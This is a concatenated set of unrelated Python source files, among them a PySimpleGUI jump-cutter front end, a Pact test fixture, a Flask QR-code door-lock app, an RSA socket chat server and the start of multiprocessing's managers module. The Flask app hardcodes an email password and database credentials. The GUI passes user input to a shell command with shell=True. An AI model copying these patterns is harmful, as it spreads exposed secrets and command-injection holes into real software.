[sg.Multiline(size=(80, 10), reroute_stdout=True, reroute_stderr=False, reroute_cprint=True, write_only=True, font='Courier 8', autoscroll=True, key='-ML-')],
[sg.Button('Start'), sg.B('Threaded'), sg.Button('Clear All'), sg.Button('PyCharm Me'), sg.Button('Help'), sg.Button('Exit'),
sg.Checkbox('Test Mode (Do not run command line)', key='-CBOX-')],
[sg.Text(f'Version = {version} PySimpleGUI Version {sg.version.split(" ")[0]}', font='Any 8', text_color='yellow')]]
window = sg.Window('Jump Cutter', layout, finalize=True, ) # adding finalize in case a print is added later before read
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Exit'): # if window was closed
break
elif event == '-THREAD-':
thread_sp = values['-THREAD-'][0]
line = values['-THREAD-'][1]
sg.cprint(line)
if line == '===THEAD DONE===':
sg.cprint(f'Completed', c='white on green')
sg.cprint('*' * 20 + 'DONE' + '*' * 20, background_color='red', text_color='white')
window.ding()
window.ding()
window.ding()
sg.popup('*' * 20 + 'DONE' + '*' * 20, title='Completed Jumpcutting!', background_color='red', text_color='white', keep_on_top=True)
elif event == 'Start': # if start button
parms = ''
for key in values:
if key not in input_defintion:
continue
if values[key] != '':
if 'file' in input_defintion[key][0]:
parms += f'{input_defintion[key][0]} "{values[key]}" '
else:
parms += f"{input_defintion[key][0]} {values[key]} "
command = command_to_run + parms
window['-COMMAND LINE-'].update(command)
if not values['-CBOX-']:
sg.popup_quick_message('Beginning conversion... this will take a long time... your window may appear',
'like it is not responding, but it will continue to be ruuning.',
'Do not close the window. You will see a red colored "DONE" message in the',
'Command Line Output area once the conversion has completed', line_width=90, keep_on_top=True, background_color='red', text_color='white',
auto_close_duration=4)
runCommand(cmd=command, window=window)
sg.cprint('*' * 20 + 'DONE' + '*' * 20, background_color='red', text_color='white')
window.ding()
window.ding()
window.ding()
sg.popup('*' * 20 + 'DONE' + '*' * 20, title='Completed Jumpcutting!', background_color='red', text_color='white', keep_on_top=True)
elif event == 'Threaded':
parms = ''
for key in values:
if key not in input_defintion:
continue
if values[key] != '':
if 'file' in input_defintion[key][0]:
parms += f'{input_defintion[key][0]} "{values[key]}" '
else:
parms += f"{input_defintion[key][0]} {values[key]} "
command = command_to_run + parms
window['-COMMAND LINE-'].update(command)
if not values['-CBOX-']:
sg.popup_quick_message('Beginning conversion... this will take a long time... your window may appear',
'like it is not responding, but it will continue to be ruuning.',
'Do not close the window. You will see a red colored "DONE" message in the',
'Command Line Output area once the conversion has completed', line_width=90, keep_on_top=True, background_color='red', text_color='white',
auto_close_duration=4)
sp = sg.execute_command_subprocess('python', command, pipe_output=True)
# sp = runCommand(cmd=command, window=window)
threading.Thread(target=the_thread, args=(window, sp), daemon=True).start()
# sg.cprint('*' * 20 + 'DONE' + '*' * 20, background_color='red', text_color='white')
# window.ding()
# window.ding()
# window.ding()
# sg.popup('*' * 20 + 'DONE' + '*' * 20, title='Completed Jumpcutting!', background_color='red', text_color='white', keep_on_top=True)
sg.cprint('THEAD STARTED!')
elif event == 'Clear All': # if clearing, erase all elements except buttons
# Will cause some heads to explode 👍🏻
_ = [window[elem].update('') for elem in values if window[elem].Type != sg.ELEM_TYPE_BUTTON]
elif event == 'PyCharm Me': # edit this file using PyCharm
sg.execute_editor(__file__)
elif event == 'Help': # display the "help text" (comment header at top of program)
sg.popup(help_text, line_width=len(max(help_text.split('\n'), key=len)))
window.close()
def runCommand(cmd, timeout=None, window=None):
""" run shell command
@param cmd: command to execute
@param timeout: timeout for command execution
@param window: the PySimpleGUI window that the output is going to (needed to do refresh on)
@return: (return code from command, command output)
"""
p = subprocess.Popen(f'"{cmd}"', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p
if __name__ == '__main__':
sg.theme('Dark Grey 9')
main() |
conftest.py | import pathlib
import sys
from multiprocessing import Process
import docker
import pytest
from testcontainers.compose import DockerCompose
from .pact_provider import run_server
@pytest.fixture(scope="module")
def server():
proc = Process(target=run_server, args=(), daemon=True)
proc.start()
yield proc
# Cleanup after test
if sys.version_info >= (3, 7):
# multiprocessing.kill is new in 3.7
proc.kill()
else:
proc.terminate()
def pytest_addoption(parser):
parser.addoption(
"--publish-pact", type=str, action="store", help="Upload generated pact file to pact broker with version"
)
parser.addoption("--run-broker", type=bool, action="store", help="Whether to run broker in this test or not.")
@pytest.fixture(scope="session", autouse=True)
def publish_existing_pact(broker):
"""Publish the contents of the pacts folder to the Pact Broker.
In normal usage, a Consumer would publish Pacts to the Pact Broker after
running tests - this fixture would NOT be needed.
.
Because the broker is being used standalone here, it will not contain the
required Pacts, so we must first spin up the pact-cli and publish them.
In the Pact Broker logs, this corresponds to the following entry:
PactBroker::Pacts::Service -- Creating new pact publication with params \
{:consumer_name=>"UserServiceClient", :provider_name=>"UserService", \
:revision_number=>nil, :consumer_version_number=>"1", :pact_version_sha=>nil, \
:consumer_name_in_pact=>"UserServiceClient", :provider_name_in_pact=>"UserService"}
"""
source = str(pathlib.Path.cwd().joinpath("..", "pacts").resolve())
pacts = [f"{source}:/pacts"]
envs = {
"PACT_BROKER_BASE_URL": "http://broker_app:9292",
"PACT_BROKER_USERNAME": "pactbroker",
"PACT_BROKER_PASSWORD": "pactbroker",
}
client = docker.from_env()
print("Publishing existing Pact")
client.containers.run(
remove=True,
network="broker_default",
volumes=pacts,
image="pactfoundation/pact-cli:latest",
environment=envs,
command="publish /pacts --consumer-app-version 1",
)
print("Finished publishing")
# This fixture is to simulate a managed Pact Broker or Pactflow account.
# For almost all purposes outside this example, you will want to use a real
# broker. See https://github.com/pact-foundation/pact_broker for further details.
@pytest.fixture(scope="session", autouse=True)
def broker(request):
version = request.config.getoption("--publish-pact")
publish = True if version else False
# If the results are not going to be published to the broker, there is
# nothing further to do anyway
if not publish:
yield
return
run_broker = request.config.getoption("--run-broker")
if run_broker:
# Start up the broker using docker-compose
print("Starting broker")
with DockerCompose("../broker", compose_file_name=["docker-compose.yml"], pull=True) as compose:
stdout, stderr = compose.get_logs()
if stderr:
print("Errors\\n:{}".format(stderr))
print("{}".format(stdout))
print("Started broker")
yield
print("Stopping broker")
print("Broker stopped")
else:
# Assuming there is a broker available already, docker-compose has been
# used manually as the --run-broker option has not been provided
yield
return
|
StandUI.py | # Software configuration
from library import config as sw_cfg
# LED status widget
from library.stand.led import LedWidget
# Suspending execution of the polling thread for the given number of seconds
from time import sleep
# Getting all possible combinations from the list
from itertools import combinations
# Foreign C compatible data types for the current transformers library
from ctypes import byref, c_int, c_long
# Threading interface
from threading import Thread, currentThread
# PyQt5 modules
from PyQt5.QtGui import QColor
from PyQt5.QtCore import QRect
from PyQt5.QtWidgets import QWidget, QGroupBox, QHBoxLayout
def cmri_click(box):
"""
Actions when the CMRI group pressed
Args:
:param box: CMRI group widget
:type box: QGroupBox
Returns:
:return: None
"""
# Getting the address of the device from the group title
sw_cfg.reset_id = int(box.title().split(" ")[2], 16)
# Setting the polling pause
sw_cfg.polling_thread.do_pause = True
class StandUI(QWidget):
# GUI widget objects
interface = dict()
def __init__(self, parent=None):
super(StandUI, self).__init__(parent)
# Setting the GUI
# The initial Y coordinate of the rack group offset
stand_y = 0
for idx, stand in enumerate(sw_cfg.stand_list, start=1):
self.interface["stand_{0}".format(idx)] = QGroupBox("Stand \"{0}\"".format(stand), self)
self.interface["stand_{0}".format(idx)].setGeometry(QRect(0, stand_y, 891, 151))
# The initial X coordinate of the row group offset
row_x = 10
# Initializing IDs for the CMRI seats
id_top = 16
id_bot = 1
# Setting 8 devices per row
for row in range(1, 9):
# The initial Y coordinate of the column group offset
col_y = 20
# Setting 2 rows
for col in range(1, 3):
# Setting IDs for the CMRI seats
if col % 2:
box_id = id_top
else:
box_id = id_bot
# CMRI group
self.interface["cmri_{0}{1}".format(stand, box_id)] = \
QGroupBox(str(box_id) + " - " + sw_cfg.git_config[stand][box_id],
self.interface["stand_{0}".format(idx)])
self.interface["cmri_{0}{1}".format(stand, box_id)].setGeometry(QRect(row_x, col_y, 100, 60))
sw_cfg.clickable_widget(self.interface["cmri_{0}{1}".format(stand, box_id)]).connect(
lambda x=self.interface["cmri_{0}{1}".format(stand, box_id)]: cmri_click(x))
# Horizontal layout inside the group
self.interface["layout_{0}{1}".format(stand, box_id)] = \
QHBoxLayout(self.interface["cmri_{0}{1}".format(stand, box_id)])
# Phase №1
self.interface["L1_{0}{1}".format(stand, box_id)] = \
LedWidget(self.interface["cmri_{0}{1}".format(stand, box_id)])
self.interface["layout_{0}{1}".format(stand, box_id)].addWidget(
self.interface["L1_{0}{1}".format(stand, box_id)])
# Phase №2
self.interface["L2_{0}{1}".format(stand, box_id)] = \
LedWidget(self.interface["cmri_{0}{1}".format(stand, box_id)])
self.interface["layout_{0}{1}".format(stand, box_id)].addWidget(
self.interface["L2_{0}{1}".format(stand, box_id)])
# Phase №3
self.interface["L3_{0}{1}".format(stand, box_id)] = \
LedWidget(self.interface["cmri_{0}{1}".format(stand, box_id)])
self.interface["layout_{0}{1}".format(stand, box_id)].addWidget(
self.interface["L3_{0}{1}".format(stand, box_id)])
# Updating Y coordinate of the column group offset
col_y += 60
# Updating X coordinate of the row group offset
row_x += 110
# Updating IDs for the CMRI seats
id_top -= 1
id_bot += 1
# Updating Y coordinate of the rack group offset
stand_y += 160
# Setting the main polling thread and default attributes
sw_cfg.polling_thread = Thread(target=self.device_polling, daemon=True)
sw_cfg.polling_thread.do_run = True
sw_cfg.polling_thread.do_pause = False
sw_cfg.polling_thread.start()
def device_polling(self):
"""
Current transformer polling thread
Returns:
:return: None
"""
# Getting the polling thread
polling_thread = currentThread()
# The primary polling cycle during the do_run = True
while getattr(polling_thread, "do_run"):
# Getting the data from current transformers during the do_pause = False
while not getattr(polling_thread, "do_pause"):
# Checking for the polling stop do_run = False
if not getattr(polling_thread, "do_run"):
break
# Continue polling
for stand in sw_cfg.stand_list:
for place in sw_cfg.git_config[stand]:
# Checking for the polling stop do_run = False or the polling pause do_pause = True
if not getattr(polling_thread, "do_run") or getattr(polling_thread, "do_pause"):
break
# Highlighting of the current polling current transformer
self.interface["cmri_{0}{1}".format(stand, place)].setStyleSheet("color: rgb(255, 0, 0);")
# Setting the address of the polled current transformer
device = int(sw_cfg.git_config[stand][place], 16)
# Getting status
get_status = sw_cfg.cmri_dll.CMRI_GetStatus(byref(c_long(device)), byref(sw_cfg.GetStatus))
# Checking for the presence of a current transformer on the line
if get_status is not 0:
# Removing the highlight of the polled device and proceeding to the next one
self.interface["cmri_{0}{1}".format(stand, place)].setStyleSheet("")
continue
# Getting a list of phases with an error
phase_list = list()
for index in range(len(sw_cfg.phase_bits), 0, -1):
for sequence in combinations(sw_cfg.phase_bits, index):
if sum(sequence) == sw_cfg.GetStatus.value:
for bit in list(sequence):
phase_list.append(sw_cfg.phase_bits.index(bit) + 1)
# Setting the corresponding indication in the presence and absence of errors
for idx in range(1, 4):
if idx in phase_list:
self.interface["L{0}_{1}{2}".format(idx, stand, place)].setColor(QColor("red"))
else:
self.interface["L{0}_{1}{2}".format(idx, stand, place)].setColor(QColor("green"))
# Getting voltage
sw_cfg.cmri_dll.CMRI_GetVoltage(c_long(device), c_int(1), byref(sw_cfg.GetVoltage_1))
sw_cfg.cmri_dll.CMRI_GetVoltage(c_long(device), c_int(2), byref(sw_cfg.GetVoltage_2))
sw_cfg.cmri_dll.CMRI_GetVoltage(c_long(device), c_int(3), byref(sw_cfg.GetVoltage_3))
# Getting current
sw_cfg.cmri_dll.CMRI_GetCurrent(c_long(device), c_int(1), byref(sw_cfg.GetCurrent_1))
sw_cfg.cmri_dll.CMRI_GetCurrent(c_long(device), c_int(2), byref(sw_cfg.GetCurrent_2))
sw_cfg.cmri_dll.CMRI_GetCurrent(c_long(device), c_int(3), byref(sw_cfg.GetCurrent_3))
# Getting temperature
sw_cfg.cmri_dll.CMRI_GetTemp(c_long(device), byref(sw_cfg.GetTemp))
# Setting tooltip
self.interface["cmri_{0}{1}".format(stand, place)].setToolTip(
"<b>Voltage L1: </b>" + str(sw_cfg.GetVoltage_1.value) + " В <br>" +
"<b>Voltage L2: </b>" + str(sw_cfg.GetVoltage_2.value) + " В <br>" +
"<b>Voltage L3: </b>" + str(sw_cfg.GetVoltage_3.value) + " В <br>" +
"<b>Current L1: </b>" + str(sw_cfg.GetCurrent_1.value) + " А <br>" +
"<b>Current L2: </b>" + str(sw_cfg.GetCurrent_2.value) + " А <br>" +
"<b>Current L3: </b>" + str(sw_cfg.GetCurrent_3.value) + " А <br>" +
"<b>Temperature: </b>" + str(sw_cfg.GetTemp.value) + " °C")
# Removing the highlight of the polled device
self.interface["cmri_{0}{1}".format(stand, place)].setStyleSheet("")
# Suspending execution of the polling thread for the given number of seconds
sleep(sw_cfg.polling_time)
# Actions when the do_pause = True set
while getattr(polling_thread, "do_pause"):
# Checking for the polling stop do_run = False
if not getattr(polling_thread, "do_run"):
break
# Resetting the specified address
sw_cfg.cmri_dll.CMRI_Reset(c_long(sw_cfg.reset_id))
# Exiting from the pause
sw_cfg.polling_thread.do_pause = False
|
usb_camera_demo.py | # -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
import os
import sys
from multiprocessing import Process, Queue
from time import sleep
from collections import deque
import click
import cv2
import numpy as np
from lmnet.common import get_color_map
from lmnet.nnlib import NNLib
from lmnet.utils.config import (
load_yaml,
build_pre_process,
build_post_process,
)
from lmnet.utils.demo import (
add_rectangle,
add_fps,
run_inference,
)
from lmnet.visualize import (
label_to_color_image,
visualize_keypoint_detection,
)
from lmnet.pre_processor import resize
nn = None
pre_process = None
post_process = None
def init_camera(camera_width, camera_height):
if hasattr(cv2, 'cv'):
vc = cv2.VideoCapture(0)
vc.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, camera_width)
vc.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, camera_height)
vc.set(cv2.cv.CV_CAP_PROP_FPS, 60)
else:
vc = cv2.VideoCapture(0)
vc.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
vc.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
vc.set(cv2.CAP_PROP_FPS, 60)
return vc
def add_class_label(canvas,
text="Hello",
font=cv2.FONT_HERSHEY_SIMPLEX,
font_scale=0.42,
font_color=(140, 40, 200),
line_type=1,
dl_corner=(50, 50)):
cv2.putText(canvas, text, dl_corner, font, font_scale, font_color, line_type)
def infer_loop(q_input, q_output):
global nn, pre_process, post_process
nn.init()
while True:
img_orig, fps = q_input.get()
img = cv2.cvtColor(img_orig, cv2.COLOR_BGR2RGB)
result, _, _ = run_inference(img, nn, pre_process, post_process)
q_output.put((result, fps, img_orig))
def show_object_detection(img, result, fps, window_height, window_width, config):
window_img = resize(img, size=[window_height, window_width])
input_width = config.IMAGE_SIZE[1]
input_height = config.IMAGE_SIZE[0]
window_img = add_rectangle(config.CLASSES,
window_img, result, (input_height, input_width)
)
img = add_fps(window_img, fps)
window_name = "Object Detection Demo"
cv2.imshow(window_name, window_img)
def show_classification(img, result, fps, window_height, window_width, config):
window_img = resize(img, size=[window_height, window_width])
result_class = np.argmax(result, axis=1)
add_class_label(window_img, text=str(result[0, result_class][0]), font_scale=0.52, dl_corner=(230, 230))
add_class_label(window_img, text=config.CLASSES[result_class[0]], font_scale=0.52, dl_corner=(230, 210))
window_img = add_fps(window_img, fps)
window_name = "Classification Demo"
cv2.imshow(window_name, window_img)
def show_semantic_segmentation(img, result, fps, window_height, window_width, config):
orig_img = resize(img, size=[window_height, window_width])
seg_img = label_to_color_image(result, colormap)
seg_img = cv2.resize(seg_img, dsize=(window_width, window_height))
window_img = cv2.addWeighted(orig_img, 1, seg_img, 0.8, 0)
window_img = add_fps(window_img, fps)
window_name = "Semantic Segmentation Demo"
cv2.imshow(window_name, window_img)
def show_keypoint_detection(img, result, fps, window_height, window_width, config):
window_img = resize(img, size=[window_height, window_width])
window_img = visualize_keypoint_detection(window_img, result[0], (input_height, input_width))
window_img = add_fps(window_img, fps)
window_name = "Keypoint Detection Demo"
cv2.imshow(window_name, window_img)
def capture_loop(q_input):
camera_width = 320
camera_height = 240
vc = init_camera(camera_width, camera_height)
count_frames = 10
prev_1 = time.clock()
prev = deque([prev_1] * count_frames)
while True:
valid, img = vc.read()
if valid:
now = time.clock()
prev.append(now)
old = prev.popleft()
fps = count_frames / (now - old)
q_input.put((img, fps))
def run_impl(config):
# Set variables
q_input = Queue(2)
q_output = Queue(4)
p_capture = Process(target=capture_loop, args=(q_input,))
p_capture.start()
p_infer = Process(target=infer_loop, args=(q_input, q_output))
p_infer.start()
window_width = 320
window_height = 240
show_handles_table = {
"IMAGE.OBJECT_DETECTION": show_object_detection,
"IMAGE.CLASSIFICATION": show_classification,
"IMAGE.SEMANTIC_SEGMENTATION": show_semantic_segmentation,
"IMAGE.KEYPOINT_DETECTION": show_keypoint_detection
}
show_handle = show_handles_table[config.TASK]
# ----------- Beginning of Main Loop ---------------
while True:
if not q_output.empty():
result, fps, img = q_output.get()
show_handle(img, result, fps, window_height, window_width, config)
key = cv2.waitKey(1) # Wait for 1ms
if key == 27: # ESC to quit
sleep(1.0) # Wait for worker's current task is finished
p_capture.terminate()
p_infer.terminate()
return
# --------------------- End of main Loop -----------------------
def run(model, config_file):
global nn, pre_process, post_process
filename, file_extension = os.path.splitext(model)
supported_files = ['.so', '.pb']
if file_extension not in supported_files:
raise Exception("""
Unknown file type. Got %s%s.
Please check the model file (-m).
Only .pb (protocol buffer) or .so (shared object) file is supported.
""" % (filename, file_extension))
config = load_yaml(config_file)
pre_process = build_pre_process(config.PRE_PROCESSOR)
post_process = build_post_process(config.POST_PROCESSOR)
if file_extension == '.so': # Shared library
nn = NNLib()
nn.load(model)
elif file_extension == '.pb': # Protocol Buffer file
# only load tensorflow if user wants to use GPU
from lmnet.tensorflow_graph_runner import TensorflowGraphRunner
nn = TensorflowGraphRunner(model)
run_impl(config)
@click.command(context_settings=dict(help_option_names=['-h', '--help']))
@click.option(
"-m",
"-l",
"--model",
type=click.Path(exists=True),
help=u"""
Inference Model filename
(-l is deprecated please use -m instead)
""",
default="../models/lib/lib_fpga.so",
)
@click.option(
"-c",
"--config_file",
type=click.Path(exists=True),
help=u"Config file Path",
default="../models/meta.yaml",
)
def main(model, config_file):
_check_deprecated_arguments()
run(model, config_file)
def _check_deprecated_arguments():
argument_list = sys.argv
if '-l' in argument_list:
print("Deprecated warning: -l is deprecated please use -m instead")
if __name__ == "__main__":
main()
|
app.py | from flask import Flask, render_template, flash, redirect, url_for, session, request, logging
#from data import Articles
from flask_mysqldb import MySQL
from wtforms import Form, StringField, TextAreaField, PasswordField, validators
from functools import wraps
import qrcode
import smtplib
import mimetypes
from datetime import datetime
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from datetime import datetime
import uuid
import os
import webcam
import threading
from threading import Thread
from apscheduler.schedulers.background import BackgroundScheduler
app = Flask(__name__)
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'user'
app.config['MYSQL_PASSWORD'] = '12345'
app.config['MYSQL_DB'] = 'BALENA_DOOR_DB'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
# init MYSQL
mysql = MySQL(app)
# Register Form Class
class RegisterForm(Form):
firstName = StringField('First Name', [validators.Length(min=1, max=50)])
lastName = StringField('Last Name', [validators.Length(min=1, max=50)])
email = StringField('Email', [validators.Length(min=6, max=50)])
def createQrCodeImage(generatedUUID):
#Creating an instance of qrcode
qr = qrcode.QRCode(
version=1,
box_size=10,
border=5)
qr.add_data(str(generatedUUID))
qr.make(fit=True)
img = qr.make_image(fill='black', back_color='white')
img.save('/home/pi/Desktop/imgRepository/qrcode_test2_2.png')
return img
def isDuplicateEmail(email):
# Create cursor
cur = mysql.connection.cursor()
result = cur.execute("SELECT * FROM D_USER WHERE EMAIL = %s",[email])
return (result)>0
# User Register
@app.route('/', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST' and form.validate():
firstName = form.firstName.data
lastName = form.lastName.data
email = form.email.data
print(firstName)
print(lastName)
print(email)
if not isDuplicateEmail(email):
generatedUUID= uuid.uuid1()
img = createQrCodeImage(generatedUUID)
# Create cursor
cur = mysql.connection.cursor()
# Execute query
cur.execute("INSERT INTO D_USER(FIRST_NAME, LAST_NAME, EMAIL, QR_CODE,CREATED_ON) VALUES(%s, %s, %s, %s, %s)", (firstName, lastName, email, str(generatedUUID), datetime.now()))
# Commit to DB
mysql.connection.commit()
# Close connection
cur.close()
sendEmail(firstName,lastName,email,img)
flash('You are now registered and can access ', 'success')
else:
flash('This email is already registered', 'error')
return render_template('register.html', form=form)
def sendEmail(firstName , lastName,email,img):
# set up the SMTP server
s = smtplib.SMTP(host='smtp.gmail.com', port=587)
s.starttls()
s.login('doorlocklabs@gmail.com', '@Firewall1984@!')
msg = MIMEMultipart() # create a message
# setup the parameters of the message
msg['From']='doorlocklabs@gmail.com'
msg['To']=email
msg['Subject']="DoorLockQR"
with open('/home/pi/Desktop/imgRepository/qrcode_test2_2.png', 'rb') as f:
img_data = f.read()
# add in the message body
msg.attach(MIMEText('BalenaMainDoor', 'plain'))
image = MIMEImage(img_data, name=os.path.basename('/home/pi/Desktop/imgRepository/qrcode_test2_2.png'))
msg.attach(image)
# send the message via the server set up earlier
s.send_message(msg)
del msg
def updateUser(user, newQrCode):
# Create cursor
cur = mysql.connection.cursor()
now = datetime.now()
# Execute query
cur.execute("UPDATE D_USER SET QR_CODE = %s ,MODIFIED_ON = %s WHERE ID = %s", (newQrCode ,now, user['ID']))
# Commit to DB
mysql.connection.commit()
def updateQrCodesForUsers():
with app.app_context():
# Create cursor
cur = mysql.connection.cursor()
result = cur.execute("SELECT * FROM D_USER")
if(result)>0:
users = cur.fetchall()
for user in users:
generatedUUID= uuid.uuid1()
updateUser(user,generatedUUID)
img = createQrCodeImage(generatedUUID)
sendEmail(user['FIRST_NAME'],user['LAST_NAME'],user['EMAIL'],img)
def runApp():
app.secret_key='secret123'
scheduler.start()
app.run(host="0.0.0.0")
scheduler = BackgroundScheduler()
job = scheduler.add_job(updateQrCodesForUsers, 'cron', day_of_week ='mon-sun', hour=00, minute=00)
if __name__ == '__main__':
try:
print(f'start first thread')
t1 = threading.Thread(target=runApp).start()
print(f'start second thread')
t2 = threading.Thread(target=webcam.startCamera()).start()
except Exception as e:
print("Unexpected error:" + str(e))
|
amsg_srv.py | #!env/bin/python3
import parser
import sys
import socket
import signal
import threading
import time
import argparse
import sqlite3
import rsa
class server:
def __init__(self,ip='localhost',port='9999'):
self.clients = {}
self.recv_value = 0
self.name = input("Enter you username for session:")
self.pubkey,self.privkey = rsa.newkeys(1024)
self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.srv.bind((ip,port))
print('Server listening to port:',port)
print("Address:",self.srv.getsockname())
self.srv.listen()
signal.signal(signal.SIGINT, self.sighandler)
def sighandler(self, signum, frame):
""" Clean up client outputs"""
# Close the serverclient1'
print ('Shutting down server')
# Close existing client sockets
for client in self.clients.keys():
client.close()
self.clients.clear()
self.srv.close()
sys.exit(0)
def close_all(self):
for client in self.clients.keys():
print(".",end='')
client.close()
self.srv.close()
sys.exit(0)
def create_connections(self):
while True:
client, address = self.srv.accept()
# sending& rcv info
self.snd_info(client)
(name,n,e) = self.rcv_info(client,address)
cli_pubk = rsa.PublicKey(int(n),int(e))
self.clients[client] = [address,cli_pubk, name]
try:
# rcv_msg from each connection
thread1 = threading.Thread(target=self.rcv_msg, args=[client,name])
thread1.start()
except Exception:
print("Error occured")
self.close_all()
return
def snd_msg(self, msg):
for client in self.clients.keys():
try:
msg = rsa.encrypt(msg.encode('utf-8'),self.clients[client][1])
client.send(msg)
return 1
except socket.error as e:
print("Error:",e)
client.close()
return 0
def rcv_msg(self,client,name):
while True:
try:
data = client.recv(1024)
if(len(data)!=0):
# return data.decode('utf-8')
msg = rsa.decrypt(data,self.privkey)
msg = msg.decode('utf-8')
con1 = sqlite3.connect('amsg.db')
cur1 = con1.cursor()
cur1.execute('insert into chat(sender,msg,time) values(?,?,?)',(name,msg,time.ctime(time.time())))
con1.commit()
self.recv_value =1
except socket.error as e:
print("Error:",e)
client.close()
print("Connection closed")
return 0
def snd_info(self,client):
n = str(self.pubkey.n)
e = str(self.pubkey.e)
info = self.name+','+n+','+e
try:
client.send(info.encode('utf-8'))
except socket.error as e:
print("Error with server:",e)
client.close()
self.close_all()
return 0
def rcv_info(self,client,address):
#waiting to recieve client nickname
try:
data = client.recv(1024)
if(len(data)!=0):
data = str(data.decode('utf-8'))
data = data.split(',')
name = data[0]
#cli_pubk = rsa.PublicKey(int(data[1]),int(data[2]))
try:
con2 = sqlite3.connect('amsg.db')
cur2 = con2.cursor()
cur2.execute('insert into User(username,ip,status,join_time) values(?,?,?,?)',(name,address[0],1,time.ctime(time.time())))
con2.commit()
print(f"Connection established with {name}({address})")
return data[0],data[1],data[2]
except sqlite3.Error as e:
print("Error with in db:",e)
self.close_all()
return
except socket.error as e:
print("Error occured",e,"No connecton established with",address)
client.close()
X = server(parser.ip,parser.port)
try:
thread = threading.Thread(target=X.create_connections)
thread.start()
except Exception:
print("Error occured")
sys.exit(1)
|
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
# send mail function
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
connection_test.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "Yiwen Sun and Ziyou Zhang"
__status__ = "Production"
import pytest
from pprint import pprint
from pymongo import MongoClient
from multiprocessing import Process
def test_connection():
with MongoClient(os.environ["CLIENT_ADDR"]) as client:
db=client.admin
serverStatusResult=db.command("serverStatus")
assert serverStatusResult["connections"]["active"] > 0
def get_connection_count():
with MongoClient(os.environ["CLIENT_ADDR"]) as client:
db=client.admin
serverStatusResult=db.command("serverStatus")
return serverStatusResult["connections"]["active"]
def test_multi_connections():
procs = []
for i in range(1000):
proc = Process(target=get_connection_count)
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
#will only reach here if all tests passed
assert True
if __name__ == "__main__":
test_multi_connections() |
managers.py | #
# Module providing manager classes for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token',
'SharedMemoryManager' ]
#
# Imports
#
import sys
import collections
import threading
import signal
import array
import queue
import time
import os
from os import getpid
from traceback import format_exc
from . import connection
from .context import reduction, get_spawning_popen, ProcessError
from . import pool
from . import process
from . import util
from . import get_context
try:
from . import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tobytes())
reduction.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
if view_types[0] is not list: # only needed in Py3.0
def rebuild_as_list(obj):
return list, (list(obj),)
for view_type in view_types:
reduction.register(view_type, rebuild_as_list)
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely indentify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return '%s(typeid=%r, address=%r, id=%r)' % \
(self.__class__.__name__, self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind in ('#TRACEBACK', '#UNSERIALIZABLE'):
if not isinstance(result, str):
raise TypeError(
"Result {0!r} (kind '{1}') type is {2}, not str".format(
result, kind, type(result)))
if kind == '#UNSERIALIZABLE':
return RemoteError('Unserializable message: %s\n' % result)
else:
return RemoteError(result)
else:
return ValueError('Unrecognized message type {!r}'.format(kind))
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
